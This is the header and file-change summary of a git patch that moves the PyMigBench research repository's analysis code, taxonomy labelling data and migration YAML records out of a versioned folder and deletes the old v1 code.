From 864f9197078674e2fe9419c33b6b3f416a4667a6 Mon Sep 17 00:00:00 2001
From: Mohayemin
Date: Mon, 29 Jan 2024 11:11:18 -0700
Subject: [PATCH] Keep the latest version of the scripts and data in the repo;
 point to the release for the old version

---
 README.md | 29 +- {v2/code => code}/.gitignore | 0 {v2/code => code}/LICENSE | 0 {v2/code => code}/configs/config.yaml | 0 {v1/code/core => code/pymigstat}/__init__.py | 0 .../pymigstat/code_change_search}/__init__.py | 0 .../code_change_search/diff_meta_parser.py | 0 .../code_change_search/find_code_changes.py | 0 .../code_change_search/usage_resolver.py | 0 .../pymigstat/complexity/__init__.py | 0 .../pymigstat/complexity/max_cardinality.py | 0 .../complexity/mfiles_migration_complexity.py | 0 .../pymigstat/complexity/mig_loc.py | 0 .../pymigstat/complexity/migration_metric.py | 0 .../pymigstat/complexity/num_apis.py | 0 .../pymigstat/complexity/num_changes.py | 0 .../pymigstat/complexity/pe_set.py | 0 .../pymigstat/complexity/prop_set.py | 0 .../pymigstat/complexity/unique_apis.py | 0 .../pymigstat/complexity/unique_mappings.py | 0 {v2/code => code}/pymigstat/config.py | 0 .../pymigstat/core}/__init__.py | 0 .../pymigstat/core/import_statement_finder.py | 0 .../pymigstat/core/pypi_cache.py | 0 {v2/code => code}/pymigstat/csv_helper.py | 0 .../pymigstat/datamodels}/__init__.py | 0 .../pymigstat/datamodels/api_mapping.py | 0 .../pymigstat/datamodels/data_reader.py | 0 .../pymigstat/datamodels/datamodel.py | 0 .../pymigstat/datamodels/loaders.py | 0 .../pymigstat/datamodels/migration.py | 0 .../pymigstat/datamodels/storage.py | 0 .../core => code/pymigstat/latex}/__init__.py | 0 {v2/code => code}/pymigstat/latex/core.py | 0 {v2/code => code}/pymigstat/latex/graphics.py | 0 {v2/code => code}/pymigstat/latex/tables.py | 0 {v2/code => code}/pymigstat/latex/utils.py | 0 {v2/code => code}/pymigstat/pymigstat.py | 0 .../pymigstat/reports/__init__.py | 0 .../pymigstat/reports/api_mapping_data.py | 0 .../pymigstat/reports/api_mapping_stats.py | 0 .../reports/big_combination_stats.py | 0 .../pymigstat/reports/cardinality_stat.py | 0 .../pymigstat/reports/code_change_summary.py | 0 .../pymigstat/reports/data_stats.py | 0 .../pymigstat/reports/export_constant_data.py | 0 .../pymigstat/reports/lib_pair_data.py | 0 .../pymigstat/reports/lib_pair_stats.py | 0 .../pymigstat/reports/mig_effort_stats.py | 0 .../pymigstat/reports/migration_summary.py | 0 {v2/code => code}/pymigstat/reports/misc.py | 0 .../reports/signature_change_stat.py | 0 .../pymigstat/reports/update_report_data.py | 0 .../pymigstat/runnables}/__init__.py | 0 .../runnables/clean_up_data_files.py | 0 .../runnables/convert_pymigbench_data.py | 0 .../pymigstat/runnables/download_repos.py | 0 .../runnables/filter_migration_data.py | 0 .../runnables/find_all_code_changes.py | 0 ...ple_migrations_for_code_change_labeling.py | 0 .../pymigstat/taxonomy}/__init__.py | 0 .../pymigstat/taxonomy/agreement_rate.py | 0 .../taxonomy/agreement_rate_round_1.py | 0 .../pymigstat/taxonomy/combine_rounds.py | 0 .../pymigstat/taxonomy/constants.py | 0 .../pymigstat/taxonomy/export_yaml.py | 0 .../pymigstat/taxonomy/generate_taxonomy.py | 0 .../pymigstat/taxonomy/merge_labellings.py | 0 .../taxonomy/merge_labellings_round_1.py | 0 {v2/code => code}/pymigstat/tools/__init__.py | 0 .../pymigstat/tools/external_tool.py | 0 .../pymigstat/tools/git_repo_wrapper.py | 0 {v2/code => code}/pymigstat/utils/__init__.py | 0 .../pymigstat/utils/gpt_client.py | 0 {v2/code => code}/pymigstat/utils/progress.py | 0 {v2/code => 
code}/pymigstat/utils/utils.py | 0 {v2/code => code}/report/code-changes.csv | 0 {v2/code => code}/report/combined-ccs-raw.csv | 0 {v2/code => code}/report/data-stats.csv | 0 {v2/code => code}/report/effort.csv | 0 .../migration-combination--with-fc-groups.csv | 0 .../report/migration-combination.csv | 0 {v2/code => code}/report/migrations.csv | 0 .../report/taxonomy-stat-table.csv | 0 {v2/code => code}/requirements.txt | 0 .../taxonomy-data/round1--merge.csv | 0 .../taxonomy-data/round1-ajay.csv | 0 .../taxonomy-data/round1-ildar.csv | 0 .../taxonomy-data/round1-moha.csv | 0 .../taxonomy-data/round1-sarah.csv | 0 .../taxonomy-data/round2--merge.csv | 0 .../taxonomy-data/round2-ajay.csv | 0 .../taxonomy-data/round2-ildar.csv | 0 .../taxonomy-data/round2-moha.csv | 0 .../taxonomy-data/round2-sarah.csv | 0 .../taxonomy-data/round3--merge.csv | 0 .../taxonomy-data/round3-ajay.csv | 0 .../taxonomy-data/round3-ildar.csv | 0 .../taxonomy-data/round3-moha.csv | 0 .../taxonomy-data/round3-sarah.csv | 0 ...tzkvn@python-http-monitoring__790a483.yaml | 0 ...ttp__httpx__sk-415@harukabot__0611d16.yaml | 0 ...ttpx__snwmds@polemicbooksapi__69df530.yaml | 0 ...chalddave@segment-any-moving__87160d0.yaml | 0 ..._click__adithyabsk@keep2roam__d340eea.yaml | 0 ...__click__amesar@mlflow-tools__431737a.yaml | 0 ...__ansible-community@molecule__b7d7740.yaml | 0 ...arse__click__clearmatics@ion__03fb3a3.yaml | 0 ...arse__click__godaddy@tartufo__553dc5f.yaml | 0 ...samples@assistant-sdk-python__38e4e64.yaml | 0 ...gparse__click__grahame@sedge__3badf07.yaml | 0 ...argparse__click__himkt@pyner__76106a9.yaml | 0 ...arse__click__klensy@wt-tools__760ff36.yaml | 0 ...se__click__kxr@o-must-gather__9da4722.yaml | 0 .../argparse__click__lqez@hog__d722ade.yaml | 0 ...lick__magnetotesting@magneto__a5c82b8.yaml | 0 ...rse__click__martinthoma@hwrt__86bc433.yaml | 0 ..._click__oca@maintainer-tools__69593ae.yaml | 0 ...yyin@google-translate-python__ac375b4.yaml | 0 ...ick__yubico@yubioath-desktop__9d601b4.yaml | 0 ...rgparse__rocketmap@rocketmap__2960ec6.yaml | 0 ...rse__docopt__ceph@teuthology__fb32105.yaml | 0 ..._hootnot@oandapyv20-examples__e1df70e.yaml | 0 ...arse__docopt__tankerhq@tbump__54b12e2.yaml | 0 ...edis__aioredis__augerai@a2ml__13ea499.yaml | 0 ...s__aioredis__eyepea@api-hour__97286ef.yaml | 0 ...__dataclasses__aiortc@aiortc__270edaf.yaml | 0 ...ataclasses__keepsafe@aiohttp__e51fb1f.yaml | 0 ...alice-assistant@projectalice__f1fe8cb.yaml | 0 ...imonlindholm@decomp-permuter__cfbb706.yaml | 0 ...ib__twiliodeved@sms2fa-flask__22eedfc.yaml | 0 ...oup__bs4__cfpb@cfgov-refresh__3262610.yaml | 0 ..._boto__whoopinc@mkwheelhouse__54806ff.yaml | 0 ...otocore__boto__zalando@spilo__a83681c.yaml | 0 ...__flask__cqmoe@python-cqhttp__f9f083e.yaml | 0 ...bottle__flask__heyman@locust__4067b92.yaml | 0 ...__flask__nicolas-van@pygreen__843c8cf.yaml | 0 ...ch__munch__1and1@confluencer__df895ac.yaml | 0 ...__fedora-infra@python-fedora__aca2a20.yaml | 0 ...ery__rq__sapfir0@premier-eye__a7375cc.yaml | 0 ...tic__attrs__rackerlabs@mimic__5bb4946.yaml | 0 ...cchardet__emlid@ntripbrowser__9161c19.yaml | 0 ...h3__jinja2__openstack@ironic__cbf214b.yaml | 0 ...tah3__jinja2__shingetsu@saku__d1ad50a.yaml | 0 ...etah__jinja2__shingetsu@saku__d1ad50a.yaml | 0 ...ttenparry@meituri-downloader__422d73b.yaml | 0 ..._argparse__neurostuff@nimare__2b80aa2.yaml | 0 ...ick__argparse__nodepy@nodepy__715142c.yaml | 0 ...__argparse__titusz@onixcheck__f17d186.yaml | 0 ...me__danielyule@hearthbreaker__d018edf.yaml | 0 ...obj__ctlearn-project@ctlearn__2375af8.yaml 
| 0 ...rser__configobj__dbcli@mycli__b7a0b0f.yaml | 0 ...v__ckan@ckanext-datapackager__a6a3fb3.yaml | 0 ...v__unicodecsv__codesy@codesy__b5824f4.yaml | 0 ...ecsv__heroku@salesforce-bulk__2f787fa.yaml | 0 ...odecsv__mlsecproject@combine__efe20ac.yaml | 0 ...v__unicodecsv__praekelt@molo__567b66f.yaml | 0 ...codecsv__radremedy@radremedy__8fa9b7f.yaml | 0 ...v__unicodecsv__shoopio@shoop__639e3b5.yaml | 0 ...epy__thombashi@datetimerange__936761f.yaml | 0 ...ypepy__thombashi@pingparsing__45fac3c.yaml | 0 ...ypepy__thombashi@sqlitebiter__26c8e74.yaml | 0 ...oudpickle__blaze@distributed__6dc1f3f.yaml | 0 ...of-systems-laboratory@beluga__078e3e5.yaml | 0 ...__drf-yasg__bcgov@theorgbook__728f86e.yaml | 0 ...-yasg__opengisch@qfieldcloud__4377d67.yaml | 0 .../django__utils__rq@django-rq__310ac1d.yaml | 0 ...t__argparse__aio-libs@aioftp__ba6ef08.yaml | 0 ...parse__deepspace2@styleframe__ffc8d76.yaml | 0 ...copt__argparse__mete0r@pyhwp__0c5c5e7.yaml | 0 ...click__michaeljoseph@changes__d9a8fae.yaml | 0 ..._pynacl__romanz@trezor-agent__e1bbdb4.yaml | 0 ...incetonuniversity@psyneulink__5253a55.yaml | 0 ...ls__omisego@plasma-contracts__fc4ac19.yaml | 0 ...tlet__gevent__c00w@bithopper__6612526.yaml | 0 ...t__gevent__noisyboiler@wampy__f87f7be.yaml | 0 ...let__gevent__phuks-co@throat__9a28960.yaml | 0 ...tlet__gevent__stefal@rtkbase__a4c347a.yaml | 0 ...abric3__invoke__skoczen@will__437f8be.yaml | 0 ...ko__mirantis@openstack-lbaas__d7440d4.yaml | 0 ...sk-restplus__kizniche@mycodo__047263b.yaml | 0 ...testdrivenio@flask-react-aws__d4119a0.yaml | 0 ...sk-restplus__ziirish@burp-ui__8ef3b62.yaml | 0 ...sk-restx__apryor6@flaskerize__59d8319.yaml | 0 ...flask-restx__kizniche@mycodo__5169173.yaml | 0 ...flask-restx__orchest@orchest__6b629d0.yaml | 0 ...egrator@pythondataintegrator__598f275.yaml | 0 ..._bottle__arosenfeld@immunedb__6141b13.yaml | 0 ...pi__bretttolbert@verbecc-svc__24a848d.yaml | 0 ...fastapi__virtuber@openvtuber__3abbc43.yaml | 0 ..._elblogbruno@notionai-mymind__002f5bd.yaml | 0 ..._quart__intel@stacks-usecase__22cc3f0.yaml | 0 ...gorchestra@learningorchestra__db7f132.yaml | 0 ...es@faster_than_flask_article__0a70f2b.yaml | 0 ...art__synesthesiam@voice2json__7ea7ddb.yaml | 0 ...ync-techniques-python-course__aa607bd.yaml | 0 ..._tornado__krischer@instaseis__13c26a6.yaml | 0 ...uvicorn__virtuber@openvtuber__3abbc43.yaml | 0 ...__rapidfuzz__nlpia@nlpia-bot__054d5d2.yaml | 0 ...__aiohttp__talkiq@gcloud-aio__45d94dd.yaml | 0 ...__aiohttp__talkiq@gcloud-aio__963f347.yaml | 0 ...__aiohttp__talkiq@gcloud-aio__d15540f.yaml | 0 ...ecloudplatform@gcloud-python__e55a1d8.yaml | 0 .../gcloud__google__wal-e@wal-e__be9820b.yaml | 0 ...ntlet__duanhongyi@dwebsocket__d707ff6.yaml | 0 ...iguelgrinberg@flask-socketio__883e73e.yaml | 0 ...ventlet__projectcalico@felix__657e727.yaml | 0 ...nt__eventlet__stefal@rtkbase__cf856c0.yaml | 0 ..._eventlet__thenetcircle@dino__119d922.yaml | 0 ...itress__openphilology@nidaba__4bab2ee.yaml | 0 ...x-rtd-theme__jamesls@semidbm__aa0baba.yaml | 0 ...ml5lib__bleach__posativ@isso__f1a4478.yaml | 0 ...tml5lib__bleach__pycon@pycon__3dba963.yaml | 0 ...b2__requests__ankitects@anki__f6245cd.yaml | 0 ...2__requests__cpfair@tapiriik__495db93.yaml | 0 ...ests__hasgeek@flask-lastuser__6114ad5.yaml | 0 ...pe-storage@python-3parclient__75b94d3.yaml | 0 ...equests__jarodl@flask-github__341c769.yaml | 0 ...b2__requests__jgorset@facepy__89ba1d4.yaml | 0 ...quests__openshot@openshot-qt__4349753.yaml | 0 ...requests__openstack@deb-nova__346d941.yaml | 0 ...__openstack@networking-cisco__075010a.yaml | 0 
...equests__wikimedia@pywikibot__952665a.yaml | 0 ...crapinghub-entrypoint-scrapy__80b2262.yaml | 0 ...y-plugins@scrapy-pagestorage__ce31d53.yaml | 0 ...lery__lonelam@onlinejudgeshu__b687d20.yaml | 0 ...r__ipaddress__google@capirca__eb768ea.yaml | 0 ...dr__ipaddress__reannz@faucet__4a23ef8.yaml | 0 ...dr__ipaddress__rvojcik@rtapi__2c25c05.yaml | 0 ...ddr__openstack@deb-designate__eb16b1e.yaml | 0 ...taddr__openstack@fuel-devops__5d0df07.yaml | 0 ...ddr__netaddr__openstack@wsme__002473c.yaml | 0 ...__py2-ipaddress__evgeni@bley__dcc4285.yaml | 0 ...-ipaddress__jdswinbank@comet__1549e86.yaml | 0 ...agic-wormhole@magic-wormhole__5b23669.yaml | 0 ...2-ipaddress__meejah@txtorcon__c8fdba0.yaml | 0 ...address__redhat-cip@hardware__a429c38.yaml | 0 ...py2-ipaddress__rvojcik@rtapi__2c25c05.yaml | 0 ...y2-ipaddress__stackstorm@st2__4022aea.yaml | 0 ...dr__napalm-automation@napalm__085994a.yaml | 0 ...t__hxlstandard@libhxl-python__0babff2.yaml | 0 ...nlessdata@tableschema-sql-py__a1385f7.yaml | 0 ...nt-kafka__biznetgio@restknot__6b10345.yaml | 0 ...ka__openstack@oslo.messaging__5a842ae.yaml | 0 ...__svenskaspel@locust-plugins__fad53da.yaml | 0 ...ldb__plyvel__ethereum@py-evm__5c273ff.yaml | 0 ...db__plyvel__gdassori@spruned__4326c64.yaml | 0 ..._obsidianforensics@hindsight__973b3d3.yaml | 0 ...__fasteners__kizniche@mycodo__547f6d9.yaml | 0 ...teners__paratoolsinc@taucmdr__2a2c28a.yaml | 0 ...asteners__samschott@maestral__e4388ee.yaml | 0 ...oguru__thombashi@sqlitebiter__311c7ce.yaml | 0 ...__loguru__thombashi@tcconfig__7ba8676.yaml | 0 ...ogging__prtg@pythonminiprobe__2b6a1ae.yaml | 0 ...__defusedxml__haiwen@seafdav__5e1291f.yaml | 0 ...envinotoolkit@open_model_zoo__7c2529f.yaml | 0 ...l__defusedxml__synacktiv@eos__ac9596f.yaml | 0 ...ptography__kevoreilly@capev2__abf58a7.yaml | 0 ..._yubico@python-u2flib-server__65c4665.yaml | 0 ...gecarleitao@public-contracts__70a229c.yaml | 0 ...ic__kickstandproject@payload__ffeff6a.yaml | 0 ...els__model__hwwang55@gcn-lpa__7a97486.yaml | 0 ...__crossbario@autobahn-python__9e00896.yaml | 0 ...ython__kushalp@serfclient-py__3adbf0f.yaml | 0 ...sing__axelrod-python@axelrod__70f3a35.yaml | 0 ...rocessing__intelpni@brainiak__e62dc1d.yaml | 0 ...essing__markovmodel@msmtools__a3a152e.yaml | 0 ...s__czheo@syntax_sugar_python__1dbc1d4.yaml | 0 ...tiprocess__jhsmit@colicoords__a082ad5.yaml | 0 ...se__napalm__afourmy@e-napalm__1033665.yaml | 0 ...taddr__ipaddress__ovirt@vdsm__6eef802.yaml | 0 ...@django-postgresql-netfields__a5a1118.yaml | 0 ...s__nitmir@policyd-rate-limit__c024e06.yaml | 0 ...openstack@networking-bagpipe__4bb14fa.yaml | 0 ...penstack@networking-fortinet__2365dcb.yaml | 0 ...ck@networking-generic-switch__c6f4b71.yaml | 0 ...ib__openstack@networking-nec__ff1695d.yaml | 0 ...ib__openstack@networking-odl__a40b9d9.yaml | 0 ...tic-version__openstack@solar__8766f11.yaml | 0 ...hlib__discogs@discogs_client__c56f61a.yaml | 0 ...xl__xlsxwriter__bcgov@gwells__57d12c4.yaml | 0 ...thon-ironic-inspector-client__c25d73e.yaml | 0 ...tack@deb-python-muranoclient__e3a2b68.yaml | 0 ...ack@python-searchlightclient__0bc93d1.yaml | 0 ...ric__aws@aws-parallelcluster__d49460a.yaml | 0 ...yle__cyberbotics@urdf2webots__723168d.yaml | 0 ...style__fabioz@PyDev.Debugger__d535c19.yaml | 0 ...pycodestyle__hhatto@autopep8__3e1c196.yaml | 0 ...odestyle__nchammas@flintrock__7323298.yaml | 0 ...destyle__openstack@designate__2c9e9f5.yaml | 0 ...ycodestyle__openstack@sahara__61b0b2e.yaml | 0 ...estyle__schlamar@flake8-todo__fcd59c6.yaml | 0 ...ow__rcos@observatory-retired__f970b54.yaml | 0 
...pil__pillow__shoebot@shoebot__0171fb9.yaml | 0 ...ucationaltestingservice@skll__f870a65.yaml | 0 ...ar__tqdm__ozencb@yts-scraper__383401a.yaml | 0 ...ssbar__tqdm__redkyn@assigner__f132d03.yaml | 0 ...qdm__rivuletstudio@rivuletpy__52068ad.yaml | 0 ...gressbar__tqdm__wkentaro@fcn__399069a.yaml | 0 ...crypt__bcrypt__weasyl@weasyl__f6230c7.yaml | 0 ...pypandoc__hustlzp@permission__d174a21.yaml | 0 ...phy__freeopcua@opcua-asyncio__cdaff15.yaml | 0 ...ome__camptocamp@c2cgeoportal__14388c3.yaml | 0 ...__pycryptodome__hhyo@archery__e192ca6.yaml | 0 ...eling@cookiecutter-pypackage__8d172cb.yaml | 0 ...ryptography__apache@libcloud__a68022d.yaml | 0 ...ography__cloudve@cloudbridge__27b217e.yaml | 0 ...tography__coresecurity@pysap__21fe13a.yaml | 0 ...tography__jvanovost@dc09_spt__08a9d0b.yaml | 0 ...ography__leifj@pyxmlsecurity__b5d88c8.yaml | 0 ...raphy__mitya57@secretstorage__e637c3b.yaml | 0 ...hy__ojarva@python-sshpubkeys__e3ee2d2.yaml | 0 ...yptography__openstack@glance__5ebde90.yaml | 0 ...openstack@keystonemiddleware__e23cb36.yaml | 0 ...phy__privacyidea@privacyidea__bcd8a45.yaml | 0 ...__cryptography__rev112@pyope__48c294a.yaml | 0 ...__cryptography__secdev@scapy__c24298b.yaml | 0 ...ography__spockbotmc@spockbot__4442170.yaml | 0 ...raphy__tgalal@python-axolotl__f74a936.yaml | 0 ...ryptography__twisted@twisted__e31995c.yaml | 0 ...e__pycryptodomex__azure@aztk__19dde42.yaml | 0 ...ryptodomex__malwaredllc@byob__9291b54.yaml | 0 ...mex__snemes@malware-analysis__02b064b.yaml | 0 ...uests__tasmota@decode-config__5be6141.yaml | 0 ...quests__upstox@upstox-python__dce8760.yaml | 0 ...s__pydot2__networkx@networkx__481f3e8.yaml | 0 ...plus__pydot2__trungdong@prov__acb9b05.yaml | 0 ...plus__pydot__mathics@mathics__915daeb.yaml | 0 ...fits__astropy__glue-viz@glue__5b2d7f9.yaml | 0 .../pyfits__astropy__icrar@ngas__fa8b714.yaml | 0 ...py__spacetelescope@pysynphot__5b80ada.yaml | 0 ...pymilvus__milvus-io@bootcamp__89c7afc.yaml | 0 ...pymilvus__milvus-io@bootcamp__a7f4c3f.yaml | 0 ...pymilvus__milvus-io@bootcamp__e5073e4.yaml | 0 ...y__RIPE-NCC@ripe-atlas-sagan__f6fc10c.yaml | 0 ..._cryptography__celery@celery__9b39fc4.yaml | 0 ...phy__openstack@neutron-lbaas__bb34d71.yaml | 0 ...pcap__pcapy__openstack@steth__a981d2e.yaml | 0 ...stneuro@nwb-conversion-tools__a2ef335.yaml | 0 ...qt5__pyside2__sanpen@gridcal__39a5dd9.yaml | 0 ..._pyside6__toufool@auto-split__86244b6.yaml | 0 ...autifulsoup4__idan@telostats__f73354a.yaml | 0 ...pyside2__qtpy__pypeit@pypeit__ba5e21a.yaml | 0 ...ud-custodian@cloud-custodian__cbaf252.yaml | 0 ...ap__ldap3__ictu@quality-time__cc47b42.yaml | 0 ...pymemcache__flan@staticdhcpd__0e64819.yaml | 0 ...s__haoxizhong@pytorch-worker__fa8de77.yaml | 0 ...rs__kaushaltrivedi@fast-bert__1c96992.yaml | 0 ...rch-transformers__naver@claf__cffe499.yaml | 0 ...sformers__tiiiger@bert_score__04376e1.yaml | 0 ...uctive-commonsense-reasoning__abfeffc.yaml | 0 ...__calclavia@story-generation__8954fad.yaml | 0 ...ce@transfer-learning-conv-ai__16074b2.yaml | 0 ...ers__intellabs@nlp-architect__9f067f2.yaml | 0 ...ansformers__jsybrandt@agatha__b570ef0.yaml | 0 ...s__transformers__nvidia@nemo__7866512.yaml | 0 ...um__oddluck@limnoria-plugins__2c40713.yaml | 0 ...um__oddluck@limnoria-plugins__33c7a3f.yaml | 0 ...activitywatch@aw-watcher-afk__297b58c.yaml | 0 ...pyyaml__oyaml__cronyo@cronyo__edd0cc6.yaml | 0 ...yaml__oyaml__gammapy@gammapy__848da63.yaml | 0 ...ud-custodian@cloud-custodian__ee4d526.yaml | 0 ...on-workflow-language@cwltool__b9b65c0.yaml | 0 ...l__ruamel.yaml__holgern@beem__f5ba90e.yaml | 0 
...aven__sentry-sdk__agdsn@sipa__ea23791.yaml | 0 ...-sdk__city-of-helsinki@respa__4fecb97.yaml | 0 ...en__sentry-sdk__etalab@udata__9bc0f73.yaml | 0 ...entry-sdk__habitissimo@myaas__0a65bcc.yaml | 0 ..._sentry-sdk__kiwicom@the-zoo__e22070c.yaml | 0 ...y-sdk__mozilla@addons-server__634c64f.yaml | 0 ...entry-sdk__onecodex@onecodex__120d961.yaml | 0 ...ainc@cfn-cross-region-export__f1120d3.yaml | 0 ...samuelcolvin@aiohttp-toolbox__3b7a2a3.yaml | 0 ...k__teamsempo@sempoblockchain__449990a.yaml | 0 ...ective@thespaghettidetective__b86b375.yaml | 0 ...n__sentry-sdk__weasyl@weasyl__d10cb16.yaml | 0 ...nect@py-walletconnect-bridge__c2d3db2.yaml | 0 ...thlib__mozilla@addons-server__5fd17b4.yaml | 0 ...s-oauthlib__getsentry@sentry__0bfe540.yaml | 0 ...thlib__gunthercox@chatterbot__6c3b234.yaml | 0 ...oauthlib__sarumont@py-trello__ede0ceb.yaml | 0 ...ests__sybrenstuvel@flickrapi__c4f8d79.yaml | 0 ...ests__aiohttp__aiortc@aiortc__d30c240.yaml | 0 ...__aiohttp__ictu@quality-time__d3a9a16.yaml | 0 ...tp__keselekpermen69@userbutt__a2dd44e.yaml | 0 ...p__paradoxalarminterface@pai__fac6f80.yaml | 0 ...ttp__raptor123471@dingolingo__1d8923a.yaml | 0 ...ync-techniques-python-course__a5c04bb.yaml | 0 ...ync-techniques-python-course__ab4e5fd.yaml | 0 ...p__usergeteam@userge-plugins__80a5434.yaml | 0 ...s__sporteasy@python-poeditor__5710859.yaml | 0 ...elai@inference-model-manager__71aff3a.yaml | 0 ...ng__tenacity__openstack@aodh__7587ab9.yaml | 0 ...nacity__openstack@ceilometer__380bb26.yaml | 0 ...__openstack@ironic-inspector__f4648fa.yaml | 0 ...__tenacity__openstack@ironic__b0607a2.yaml | 0 ...ainc@cfn-cross-region-export__8d0ec68.yaml | 0 ...ning@push-button-stop-motion__0b6cdad.yaml | 0 ...ud-custodian@cloud-custodian__12e3e80.yaml | 0 ....yaml__pyyaml__microsoft@nni__b955ac9.yaml | 0 ...projections@covid-data-model__95385ff.yaml | 0 ...mplejson__ujson__zulip@zulip__222ef67.yaml | 0 ...dk__alice-biometrics@petisco__9abf7b1.yaml | 0 ...kapi@python-slack-events-api__813214e.yaml | 0 ...k__slackapi@python-slack-sdk__5f4d92a.yaml | 0 ...-sdk__zulip@python-zulip-api__2d9cf64.yaml | 0 ...-cffi__smbus2__pimoroni@inky__cba3651.yaml | 0 ...-sphinx-theme__edx@ecommerce__c1e120f.yaml | 0 ...-sphinx-theme__bashtage@arch__3620700.yaml | 0 ...zeep__whynothugo@django-afip__827dd9f.yaml | 0 .../suds__zeep__hbldh@pybankid__79e424c.yaml | 0 ...enstate@open-raadsinformatie__b56e481.yaml | 0 .../tables__h5py__yoseflab@scvi__35163f0.yaml | 0 ...omlkit__greenbone@python-gvm__75a11ed.yaml | 0 .../toolz__cytoolz__nlesc@xtas__0dbf388.yaml | 0 ...__asyncio__popupcad@popupcad__d0526f6.yaml | 0 ...tweepy__cloudbotirc@cloudbot__f824322.yaml | 0 ...__tweepy__huntwelch@mongobot__bea008a.yaml | 0 ...fonttools__googlefonts@cu2qu__3543e4f.yaml | 0 ...on__htrc@htrc-feature-reader__7eae68a.yaml | 0 ...json__rapidjson__kinto@kinto__951dd25.yaml | 0 ...__rapidjson__murthylab@sleap__50721de.yaml | 0 ...k__msgpack__logicaldash@lise__028d0b3.yaml | 0 ...csv__csv__cfpb@cfgov-refresh__b4beec3.yaml | 0 ...csv__csv__seed-platform@seed__119ba4b.yaml | 0 ...pathlib__studentenportal@web__4842cff.yaml | 0 ...byrnereese@uphold-sdk-python__14fd085.yaml | 0 ...quests__canonical@cloud-init__0fc887d.yaml | 0 ...__requests__finish06@pyunifi__3e53482.yaml | 0 ...ts__mixpanel@mixpanel-python__e8a9330.yaml | 0 ...hdog__pyinotify__onitu@onitu__04575c8.yaml | 0 ...ebapp2__flask__c4rlo@vimhelp__7a5fadf.yaml | 0 ...ahlia@sqlalchemy-imageattach__7cd3ca5.yaml | 0 ...requests__noaa-oar-arl@monet__590936b.yaml | 0 ...iter__openpyxl__bcgov@gwells__472f336.yaml | 0 
v1/code/.gitignore | 1 - v1/code/.idea/.gitignore | 8 - v1/code/.idea/code.iml | 13 - .../inspectionProfiles/Project_Default.xml | 7 - .../inspectionProfiles/profiles_settings.xml | 6 - v1/code/.idea/misc.xml | 4 - v1/code/.idea/modules.xml | 8 - v1/code/.idea/vcs.xml | 6 - v1/code/core/Arguments.py | 49 - v1/code/core/Constants.py | 9 - v1/code/core/Factory.py | 34 - v1/code/core/to_dict.py | 16 - v1/code/db/Db.py | 61 - v1/code/db/__init__.py | 1 - v1/code/format/JSONFormat.py | 9 - v1/code/format/OutputFormat.py | 18 - v1/code/format/YAMLFormat.py | 9 - v1/code/format/__init__.py | 1 - v1/code/pymigbench.py | 23 - v1/code/query/Count.py | 12 - v1/code/query/Detail.py | 7 - v1/code/query/Listing.py | 7 - v1/code/query/Query.py | 30 - v1/code/query/Result.py | 16 - v1/code/query/Summary.py | 54 - v1/code/requirements.txt | 1 - v1/code/tests/__init__.py | 1 - v1/code/tests/misc_test.py | 33 - ...sipa__ea23791__sipa$initialization.py.diff | 58 - ..._ea23791__sipa$initialization.py.source.py | 215 -- ..._ea23791__sipa$initialization.py.target.py | 212 -- ...pplication$notifier$slack_notifier.py.diff | 65 - ...ation$notifier$slack_notifier.py.source.py | 42 - ...ation$notifier$slack_notifier.py.target.py | 60 - ...sco$extra$slack$is_slack_available.py.diff | 12 - ...xtra$slack$is_slack_available.py.source.py | 6 - ...xtra$slack$is_slack_available.py.target.py | 6 - ...nfrastructure$slack$slack_notifier.py.diff | 12 - ...tructure$slack$slack_notifier.py.source.py | 36 - ...tructure$slack$slack_notifier.py.target.py | 36 - ...rize__59d8319__flaskerize$generate.py.diff | 13 - ..._59d8319__flaskerize$generate.py.source.py | 302 -- ..._59d8319__flaskerize$generate.py.target.py | 302 -- ...me }}.template$controller.py.template.diff | 13 - ....template$controller.py.template.source.py | 57 - ....template$controller.py.template.target.py | 57 - ...s${{ name }}.template$app$__init__.py.diff | 12 - ...name }}.template$app$__init__.py.source.py | 23 - ...name }}.template$app$__init__.py.target.py | 23 - ... 
}}.template$app$widget$controller.py.diff | 12 - ...emplate$app$widget$controller.py.source.py | 56 - ...emplate$app$widget$controller.py.target.py | 56 - .../azure@aztk__19dde42__aztk$client.py.diff | 13 - ...re@aztk__19dde42__aztk$client.py.source.py | 401 --- ...re@aztk__19dde42__aztk$client.py.target.py | 401 --- ...k$node_scripts$install$create_user.py.diff | 15 - ...e_scripts$install$create_user.py.source.py | 55 - ...e_scripts$install$create_user.py.target.py | 55 - ..._19dde42__aztk$spark$models$models.py.diff | 11 - ...e42__aztk$spark$models$models.py.source.py | 312 -- ...e42__aztk$spark$models$models.py.target.py | 312 -- ...__19dde42__aztk$utils$secure_utils.py.diff | 14 - ...de42__aztk$utils$secure_utils.py.source.py | 18 - ...de42__aztk$utils$secure_utils.py.target.py | 18 - ...d$wells$management$commands$export.py.diff | 127 - ...ls$management$commands$export.py.source.py | 221 -- ...ls$management$commands$export.py.target.py | 228 -- ...d$wells$management$commands$export.py.diff | 101 - ...ls$management$commands$export.py.source.py | 228 -- ...ls$management$commands$export.py.target.py | 231 -- ...k__728f86e__tob-api$api_v2$swagger.py.diff | 15 - ...8f86e__tob-api$api_v2$swagger.py.source.py | 33 - ...8f86e__tob-api$api_v2$swagger.py.target.py | 35 - ...6b10345__agent$dnsagent$clis$start.py.diff | 79 - ...45__agent$dnsagent$clis$start.py.source.py | 62 - ...45__agent$dnsagent$clis$start.py.target.py | 61 - ..._6b10345__api$app$helpers$producer.py.diff | 53 - ...345__api$app$helpers$producer.py.source.py | 38 - ...345__api$app$helpers$producer.py.target.py | 44 - ..._python$verb_conjugate_fr$__init__.py.diff | 15 - ...on$verb_conjugate_fr$__init__.py.source.py | 8 - ...on$verb_conjugate_fr$__init__.py.target.py | 5 - ...al$c2cgeoportal_geoportal$__init__.py.diff | 19 - ...cgeoportal_geoportal$__init__.py.source.py | 765 ---- ...cgeoportal_geoportal$__init__.py.target.py | 769 ---- ...oportal_geoportal$scripts$urllogin.py.diff | 20 - ...al_geoportal$scripts$urllogin.py.source.py | 72 - ...al_geoportal$scripts$urllogin.py.target.py | 73 - ...0__tools$c7n_mailer$c7n_mailer$cli.py.diff | 18 - ...ols$c7n_mailer$c7n_mailer$cli.py.source.py | 257 -- ...ols$c7n_mailer$c7n_mailer$cli.py.target.py | 257 -- ...tools$c7n_mailer$c7n_mailer$replay.py.diff | 20 - ...$c7n_mailer$c7n_mailer$replay.py.source.py | 144 - ...$c7n_mailer$c7n_mailer$replay.py.target.py | 144 - ..._tools$c7n_mailer$c7n_mailer$utils.py.diff | 19 - 